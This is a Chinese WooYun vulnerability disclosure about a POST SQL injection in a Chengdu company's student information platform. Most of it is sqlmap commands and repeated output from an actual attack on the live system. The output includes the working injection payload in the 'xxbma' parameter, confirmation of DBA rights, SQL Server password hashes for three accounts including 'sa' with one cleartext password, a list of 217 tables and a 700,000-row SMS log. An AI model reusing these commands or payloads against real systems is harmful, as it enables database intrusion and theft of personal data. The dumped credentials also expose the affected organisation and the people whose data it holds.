当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157109

漏洞标题:成都长力和信科技有限公司学生信息平台存在POST型SQL注射漏洞(DBA权限+系统管理员密码+217个表+70万手机信息发送日志)

相关厂商:成都长力和信科技有限公司

漏洞作者: 路人甲

提交时间:2015-12-03 01:42

修复时间:2016-01-18 11:32

公开时间:2016-01-18 11:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经确认,细节仅向厂商公开
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

成都长力和信科技有限公司学生信息平台存在POST型SQL注射漏洞(DBA权限+系统管理员密码+217个表+70万手机信息发送日志)

详细说明:

地址:http://**.**.**.**/public/login.aspx

$ python sqlmap.py -u "http://**.**.**.**/public/login.aspx" -p xxbma --technique=B --form --random-agent --batch  -D jxt -T MobileSendLog --columns --count --current-user --is-dba --users --passwords


current user:    'asianpeng'
current user is DBA:    True
database management system users [3]:
[*] asianpeng
[*] esk
[*] sa
database management system users password hashes:
[*] asianpeng [1]:
    password hash: 0x010086030ab7cb31ab7fc3d4b8d2a89093438c140c8108aee4bc
        header: 0x0100
        salt: 86030ab7
        mixedcase: cb31ab7fc3d4b8d2a89093438c140c8108aee4bc
[*] esk [1]:
    password hash: 0x0100aa4e0d9547840c6a3668d3aff14883fda2289eceadbbae84
        header: 0x0100
        salt: aa4e0d95
        mixedcase: 47840c6a3668d3aff14883fda2289eceadbbae84
    clear-text password: esk
[*] sa [1]:
    password hash: 0x01004086ceb694708f6c97df5631796b1db93ab5b933957419c5
        header: 0x0100
        salt: 4086ceb6
        mixedcase: 94708f6c97df5631796b1db93ab5b933957419c5


Database: jxt
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| dbo.MobileSendLog | 707951  |
+-------------------+---------+


Database: jxt
Table: MobileSendLog
[16 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| bj_id         | int      |
| Content       | varchar  |
| CreateDate    | datetime |
| DelaySendTime | varchar  |
| Flag          | tinyint  |
| ID            | int      |
| lb_id         | int      |
| Mobile        | varchar  |
| mobileKind    | int      |
| RealSendTime  | datetime |
| SendDate      | datetime |
| SentTime      | tinyint  |
| smsNumber     | int      |
| SP_provider   | tinyint  |
| xxid          | varchar  |
| zh_id         | int      |
+---------------+----------+


Database: jxt
[217 tables]
+----------------------------+
| A_D_dlshang                |
| A_S_Khwda                  |
| A_S_cdan                   |
| A_S_config                 |
| A_S_jse                    |
| A_S_qxian                  |
| A_S_zhu                    |
| A_W_Kjian                  |
| A_W_lmu                    |
| A_W_xwen                   |
| A_W_zliao                  |
| A_W_zllbie                 |
| A_keyword                  |
| AttCount                   |
| AttData                    |
| AttSmsReadyToSend          |
| AttendanceMachine          |
| AttendanceSMSStatus        |
| AttendanceSMSStatus_backup |
| BillingSchools             |
| ClassCategory              |
| ClassSms                   |
| CountUsers                 |
| DIY_TEMPCOMMAND_TABLE      |
| GetPwd                     |
| GradeCategory              |
| I_fblbie                   |
| I_fbxxi                    |
| I_fbxxiLog                 |
| I_fbxxiV                   |
| I_fbxxi_CJDX               |
| I_fbxxi_GXDX               |
| I_fbxxi_HFJZ               |
| I_fbxxi_JSDX               |
| I_fbxxi_JXHD               |
| I_fbxxi_KQDX               |
| I_fbxxi_User_Del           |
| I_fbxxi_recycle            |
| I_fkxxi                    |
| I_jsfkxxi                  |
| I_kqxxi                    |
| I_schoolPyu                |
| I_xspyu                    |
| JXHD_Repeat                |
| KQStatus                   |
| K_kqxxi                    |
| Log                        |
| MC                         |
| MobileGet                  |
| MobileSend                 |
| MobileSendLog              |
| MobileSendV                |
| N_Dzjtiao                  |
| N_Fdszhi                   |
| N_JSKQGX_Jlu               |
| N_JSKQGX_Szhi              |
| N_JSKQ_Card                |
| N_JSKQ_Jlu                 |
| N_JSKQ_Szhi                |
| N_KqJlu                    |
| N_KqJlu2                   |
| N_KqJluLog                 |
| N_KqJlu_test               |
| N_KqLmu                    |
| N_Kqszhi                   |
| N_KsNoTji                  |
| N_XsCard                   |
| N_XsCard_History           |
| N_jskqjl                   |
| N_kqjluV                   |
| O_grswu                    |
| O_kcbiao                   |
| O_xxckan                   |
| O_xxswu                    |
| ParamList                  |
| ReceiveLastID              |
| RrechargeNum               |
| SMSContentBank             |
| SMSError                   |
| SMSRrecharge               |
| SMSSchoolRrecharge         |
| SMSTotal                   |
| SP_provider                |
| S_Advice                   |
| S_BjJshi                   |
| S_Jses                     |
| S_Lmu                      |
| S_bji                      |
| S_cdan                     |
| S_config                   |
| S_jse                      |
| S_kmu                      |
| S_nji                      |
| S_qxian                    |
| S_xxjgou                   |
| S_yfjbxxi                  |
| S_zdyljie                  |
| S_zhu                      |
| S_ztai                     |
| SendAccountsTime           |
| SendAttendanceSMS          |
| SendCount                  |
| SendLog                    |
| SendLog2                   |
| SendLogBackUp              |
| SendMonth                  |
| SendNum                    |
| SendYear                   |
| Send_Sms_S_Zhu             |
| Send_Sms_U_zhu             |
| Send_Sms_U_zhu_back        |
| SmsReadyToSend             |
| Stca                       |
| StuStatusTotal             |
| Stu_SMSStatus              |
| Stu_SMSStatus_backup       |
| SurplusNum                 |
| T_cjpming                  |
| T_cjpming_backup           |
| T_cjxxi                    |
| T_cjxxi_bakcup             |
| T_fzszhi                   |
| T_kongzhiqipeizhi          |
| T_ksxxi                    |
| T_ksxxi_backup             |
| T_kszhi                    |
| T_xqszhi                   |
| Target                     |
| Tea_SMSStatus              |
| Tea_SMSStatus_backup       |
| Teasms                     |
| Temp_MobileSend            |
| U_bjsquan                  |
| U_jbxxi                    |
| U_jcxxi                    |
| U_studentGroup             |
| U_xsjzhang                 |
| U_zhlbie                   |
| U_zhu                      |
| U_zhu_backup               |
| V_black                    |
| V_jiegua                   |
| V_teacher                  |
| V_white                    |
| View_Card_Student          |
| View_Card_Teacher          |
| View_NoCard_Student        |
| View_NoCard_Teacher        |
| VisitRecord                |
| WirelessAMCardID           |
| Yf_sendCount               |
| accessToken                |
| att_fbxxi                  |
| attinfo                    |
| attinfo_backup             |
| attinfolog                 |
| attschool                  |
| bjixxtji                   |
| black                      |
| cjtemplate                 |
| classes                    |
| comd_list                  |
| department                 |
| dianzaninfo                |
| dtproperties               |
| everyDay                   |
| everyMonth                 |
| iccardid                   |
| jz_loginstate              |
| kqDuanXin                  |
| kqxx                       |
| loginState                 |
| messageGroup               |
| pangolin_test_table        |
| s_schoolMsg                |
| s_schoolMsgType            |
| scholarship                |
| select_check_sms           |
| select_users               |
| sendlog_day                |
| sendweixinmessage          |
| smsbackground              |
| smscategory                |
| smschengji                 |
| sqlmapoutput               |
| stuatt                     |
| stuinfo                    |
| sysdiagrams                |
| systemc                    |
| t_jiaozhu                  |
| tablespaceinfo             |
| test1                      |
| tmptable                   |
| tongji                     |
| tongji_LB                  |
| tt                         |
| ttt                        |
| view_chengji               |
| view_messageGroup          |
| view_parentsaccount        |
| view_smsBodyPart           |
| view_smscheck              |
| voteclass                  |
| voteinfo                   |
| votestu                    |
| weixinid                   |
| weixinmessage              |
| weixinmessage2             |
| weixinmessage_definitetime |
| weixinmessage_history      |
| wrong                      |
| wx_sendlog                 |
| wx_sendlog2                |
| wxtwclass                  |
| wxtwstu                    |
| zslq                       |
| zslqinfo                   |
+----------------------------+

漏洞证明:

---
Parameter: xxbma (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3NjYxNDYyOTYPZBYCAgEPZBYCAgcPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlyZUxvZ2luQ2IFBlN1Ym1pdC7t6YwKeV1j6wXFjSRt0c/UwNbK&hid1=0&urlstr=KtHl&fileUrl=&xxbma=CzUZ';IF(8225=8225) SELECT 8225 ELSE DROP FUNCTION ybUR--&zhmingTxt=&mmaTxt=YCmM&reLoginCb=on&Submit.x=1&Submit.y=1&__EVENTVALIDATION=/wEWCQKPv6PkDwK+mfWHCAKTxZ3LDgLjy5zWDgKNv+jBBALiufzTCAKW0fqxDwKG0anvBwK8w4S2BKzuN2uuwTXS6SRvsYWqkBrbXUdD
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user:    'asianpeng'
current user is DBA:    True
database management system users [3]:
[*] asianpeng
[*] esk
[*] sa
database management system users password hashes:
[*] asianpeng [1]:
    password hash: 0x010086030ab7cb31ab7fc3d4b8d2a89093438c140c8108aee4bc
        header: 0x0100
        salt: 86030ab7
        mixedcase: cb31ab7fc3d4b8d2a89093438c140c8108aee4bc
[*] esk [1]:
    password hash: 0x0100aa4e0d9547840c6a3668d3aff14883fda2289eceadbbae84
        header: 0x0100
        salt: aa4e0d95
        mixedcase: 47840c6a3668d3aff14883fda2289eceadbbae84
    clear-text password: esk
[*] sa [1]:
    password hash: 0x01004086ceb694708f6c97df5631796b1db93ab5b933957419c5
        header: 0x0100
        salt: 4086ceb6
        mixedcase: 94708f6c97df5631796b1db93ab5b933957419c5
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: xxbma (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3NjYxNDYyOTYPZBYCAgEPZBYCAgcPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlyZUxvZ2luQ2IFBlN1Ym1pdC7t6YwKeV1j6wXFjSRt0c/UwNbK&hid1=0&urlstr=KtHl&fileUrl=&xxbma=CzUZ';IF(8225=8225) SELECT 8225 ELSE DROP FUNCTION ybUR--&zhmingTxt=&mmaTxt=YCmM&reLoginCb=on&Submit.x=1&Submit.y=1&__EVENTVALIDATION=/wEWCQKPv6PkDwK+mfWHCAKTxZ3LDgLjy5zWDgKNv+jBBALiufzTCAKW0fqxDwKG0anvBwK8w4S2BKzuN2uuwTXS6SRvsYWqkBrbXUdD
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: xxbma (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3NjYxNDYyOTYPZBYCAgEPZBYCAgcPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlyZUxvZ2luQ2IFBlN1Ym1pdC7t6YwKeV1j6wXFjSRt0c/UwNbK&hid1=0&urlstr=KtHl&fileUrl=&xxbma=CzUZ';IF(8225=8225) SELECT 8225 ELSE DROP FUNCTION ybUR--&zhmingTxt=&mmaTxt=YCmM&reLoginCb=on&Submit.x=1&Submit.y=1&__EVENTVALIDATION=/wEWCQKPv6PkDwK+mfWHCAKTxZ3LDgLjy5zWDgKNv+jBBALiufzTCAKW0fqxDwKG0anvBwK8w4S2BKzuN2uuwTXS6SRvsYWqkBrbXUdD
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] esk_db
[*] jxt
[*] master
[*] model
[*] msdb
[*] tempdb
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: xxbma (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3NjYxNDYyOTYPZBYCAgEPZBYCAgcPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlyZUxvZ2luQ2IFBlN1Ym1pdC7t6YwKeV1j6wXFjSRt0c/UwNbK&hid1=0&urlstr=KtHl&fileUrl=&xxbma=CzUZ';IF(8225=8225) SELECT 8225 ELSE DROP FUNCTION ybUR--&zhmingTxt=&mmaTxt=YCmM&reLoginCb=on&Submit.x=1&Submit.y=1&__EVENTVALIDATION=/wEWCQKPv6PkDwK+mfWHCAKTxZ3LDgLjy5zWDgKNv+jBBALiufzTCAKW0fqxDwKG0anvBwK8w4S2BKzuN2uuwTXS6SRvsYWqkBrbXUdD
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: xxbma (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3NjYxNDYyOTYPZBYCAgEPZBYCAgcPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlyZUxvZ2luQ2IFBlN1Ym1pdC7t6YwKeV1j6wXFjSRt0c/UwNbK&hid1=0&urlstr=KtHl&fileUrl=&xxbma=CzUZ';IF(8225=8225) SELECT 8225 ELSE DROP FUNCTION ybUR--&zhmingTxt=&mmaTxt=YCmM&reLoginCb=on&Submit.x=1&Submit.y=1&__EVENTVALIDATION=/wEWCQKPv6PkDwK+mfWHCAKTxZ3LDgLjy5zWDgKNv+jBBALiufzTCAKW0fqxDwKG0anvBwK8w4S2BKzuN2uuwTXS6SRvsYWqkBrbXUdD
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: jxt
[217 tables]
+----------------------------+
| A_D_dlshang                |
| A_S_Khwda                  |
| A_S_cdan                   |
| A_S_config                 |
| A_S_jse                    |
| A_S_qxian                  |
| A_S_zhu                    |
| A_W_Kjian                  |
| A_W_lmu                    |
| A_W_xwen                   |
| A_W_zliao                  |
| A_W_zllbie                 |
| A_keyword                  |
| AttCount                   |
| AttData                    |
| AttSmsReadyToSend          |
| AttendanceMachine          |
| AttendanceSMSStatus        |
| AttendanceSMSStatus_backup |
| BillingSchools             |
| ClassCategory              |
| ClassSms                   |
| CountUsers                 |
| DIY_TEMPCOMMAND_TABLE      |
| GetPwd                     |
| GradeCategory              |
| I_fblbie                   |
| I_fbxxi                    |
| I_fbxxiLog                 |
| I_fbxxiV                   |
| I_fbxxi_CJDX               |
| I_fbxxi_GXDX               |
| I_fbxxi_HFJZ               |
| I_fbxxi_JSDX               |
| I_fbxxi_JXHD               |
| I_fbxxi_KQDX               |
| I_fbxxi_User_Del           |
| I_fbxxi_recycle            |
| I_fkxxi                    |
| I_jsfkxxi                  |
| I_kqxxi                    |
| I_schoolPyu                |
| I_xspyu                    |
| JXHD_Repeat                |
| KQStatus                   |
| K_kqxxi                    |
| Log                        |
| MC                         |
| MobileGet                  |
| MobileSend                 |
| MobileSendLog              |
| MobileSendV                |
| N_Dzjtiao                  |
| N_Fdszhi                   |
| N_JSKQGX_Jlu               |
| N_JSKQGX_Szhi              |
| N_JSKQ_Card                |
| N_JSKQ_Jlu                 |
| N_JSKQ_Szhi                |
| N_KqJlu                    |
| N_KqJlu2                   |
| N_KqJluLog                 |
| N_KqJlu_test               |
| N_KqLmu                    |
| N_Kqszhi                   |
| N_KsNoTji                  |
| N_XsCard                   |
| N_XsCard_History           |
| N_jskqjl                   |
| N_kqjluV                   |
| O_grswu                    |
| O_kcbiao                   |
| O_xxckan                   |
| O_xxswu                    |
| ParamList                  |
| ReceiveLastID              |
| RrechargeNum               |
| SMSContentBank             |
| SMSError                   |
| SMSRrecharge               |
| SMSSchoolRrecharge         |
| SMSTotal                   |
| SP_provider                |
| S_Advice                   |
| S_BjJshi                   |
| S_Jses                     |
| S_Lmu                      |
| S_bji                      |
| S_cdan                     |
| S_config                   |
| S_jse                      |
| S_kmu                      |
| S_nji                      |
| S_qxian                    |
| S_xxjgou                   |
| S_yfjbxxi                  |
| S_zdyljie                  |
| S_zhu                      |
| S_ztai                     |
| SendAccountsTime           |
| SendAttendanceSMS          |
| SendCount                  |
| SendLog                    |
| SendLog2                   |
| SendLogBackUp              |
| SendMonth                  |
| SendNum                    |
| SendYear                   |
| Send_Sms_S_Zhu             |
| Send_Sms_U_zhu             |
| Send_Sms_U_zhu_back        |
| SmsReadyToSend             |
| Stca                       |
| StuStatusTotal             |
| Stu_SMSStatus              |
| Stu_SMSStatus_backup       |
| SurplusNum                 |
| T_cjpming                  |
| T_cjpming_backup           |
| T_cjxxi                    |
| T_cjxxi_bakcup             |
| T_fzszhi                   |
| T_kongzhiqipeizhi          |
| T_ksxxi                    |
| T_ksxxi_backup             |
| T_kszhi                    |
| T_xqszhi                   |
| Target                     |
| Tea_SMSStatus              |
| Tea_SMSStatus_backup       |
| Teasms                     |
| Temp_MobileSend            |
| U_bjsquan                  |
| U_jbxxi                    |
| U_jcxxi                    |
| U_studentGroup             |
| U_xsjzhang                 |
| U_zhlbie                   |
| U_zhu                      |
| U_zhu_backup               |
| V_black                    |
| V_jiegua                   |
| V_teacher                  |
| V_white                    |
| View_Card_Student          |
| View_Card_Teacher          |
| View_NoCard_Student        |
| View_NoCard_Teacher        |
| VisitRecord                |
| WirelessAMCardID           |
| Yf_sendCount               |
| accessToken                |
| att_fbxxi                  |
| attinfo                    |
| attinfo_backup             |
| attinfolog                 |
| attschool                  |
| bjixxtji                   |
| black                      |
| cjtemplate                 |
| classes                    |
| comd_list                  |
| department                 |
| dianzaninfo                |
| dtproperties               |
| everyDay                   |
| everyMonth                 |
| iccardid                   |
| jz_loginstate              |
| kqDuanXin                  |
| kqxx                       |
| loginState                 |
| messageGroup               |
| pangolin_test_table        |
| s_schoolMsg                |
| s_schoolMsgType            |
| scholarship                |
| select_check_sms           |
| select_users               |
| sendlog_day                |
| sendweixinmessage          |
| smsbackground              |
| smscategory                |
| smschengji                 |
| sqlmapoutput               |
| stuatt                     |
| stuinfo                    |
| sysdiagrams                |
| systemc                    |
| t_jiaozhu                  |
| tablespaceinfo             |
| test1                      |
| tmptable                   |
| tongji                     |
| tongji_LB                  |
| tt                         |
| ttt                        |
| view_chengji               |
| view_messageGroup          |
| view_parentsaccount        |
| view_smsBodyPart           |
| view_smscheck              |
| voteclass                  |
| voteinfo                   |
| votestu                    |
| weixinid                   |
| weixinmessage              |
| weixinmessage2             |
| weixinmessage_definitetime |
| weixinmessage_history      |
| wrong                      |
| wx_sendlog                 |
| wx_sendlog2                |
| wxtwclass                  |
| wxtwstu                    |
| zslq                       |
| zslqinfo                   |
+----------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: xxbma (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3NjYxNDYyOTYPZBYCAgEPZBYCAgcPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlyZUxvZ2luQ2IFBlN1Ym1pdC7t6YwKeV1j6wXFjSRt0c/UwNbK&hid1=0&urlstr=KtHl&fileUrl=&xxbma=CzUZ';IF(8225=8225) SELECT 8225 ELSE DROP FUNCTION ybUR--&zhmingTxt=&mmaTxt=YCmM&reLoginCb=on&Submit.x=1&Submit.y=1&__EVENTVALIDATION=/wEWCQKPv6PkDwK+mfWHCAKTxZ3LDgLjy5zWDgKNv+jBBALiufzTCAKW0fqxDwKG0anvBwK8w4S2BKzuN2uuwTXS6SRvsYWqkBrbXUdD
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: jxt
Table: AttendanceSMSStatus
[17 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| classid       | int      |
| classname     | varchar  |
| content       | varchar  |
| describe      | varchar  |
| gradeid       | int      |
| gradename     | varchar  |
| id            | int      |
| mterrcode     | varchar  |
| mtmsgid       | varchar  |
| mtstat        | varchar  |
| receiveid     | int      |
| receivemobile | varchar  |
| receivename   | varchar  |
| schoolid      | int      |
| schoolname    | varchar  |
| sendname      | varchar  |
| sendtime      | datetime |
+---------------+----------+


Database: jxt
Table: MobileSendLog
[16 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| bj_id         | int      |
| Content       | varchar  |
| CreateDate    | datetime |
| DelaySendTime | varchar  |
| Flag          | tinyint  |
| ID            | int      |
| lb_id         | int      |
| Mobile        | varchar  |
| mobileKind    | int      |
| RealSendTime  | datetime |
| SendDate      | datetime |
| SentTime      | tinyint  |
| smsNumber     | int      |
| SP_provider   | tinyint  |
| xxid          | varchar  |
| zh_id         | int      |
+---------------+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: xxbma (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3NjYxNDYyOTYPZBYCAgEPZBYCAgcPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlyZUxvZ2luQ2IFBlN1Ym1pdC7t6YwKeV1j6wXFjSRt0c/UwNbK&hid1=0&urlstr=KtHl&fileUrl=&xxbma=CzUZ';IF(8225=8225) SELECT 8225 ELSE DROP FUNCTION ybUR--&zhmingTxt=&mmaTxt=YCmM&reLoginCb=on&Submit.x=1&Submit.y=1&__EVENTVALIDATION=/wEWCQKPv6PkDwK+mfWHCAKTxZ3LDgLjy5zWDgKNv+jBBALiufzTCAKW0fqxDwKG0anvBwK8w4S2BKzuN2uuwTXS6SRvsYWqkBrbXUdD
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: jxt
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| dbo.MobileSendLog | 707951  |
+-------------------+---------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-07 18:14

厂商回复:

CNVD未直接复现所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

评价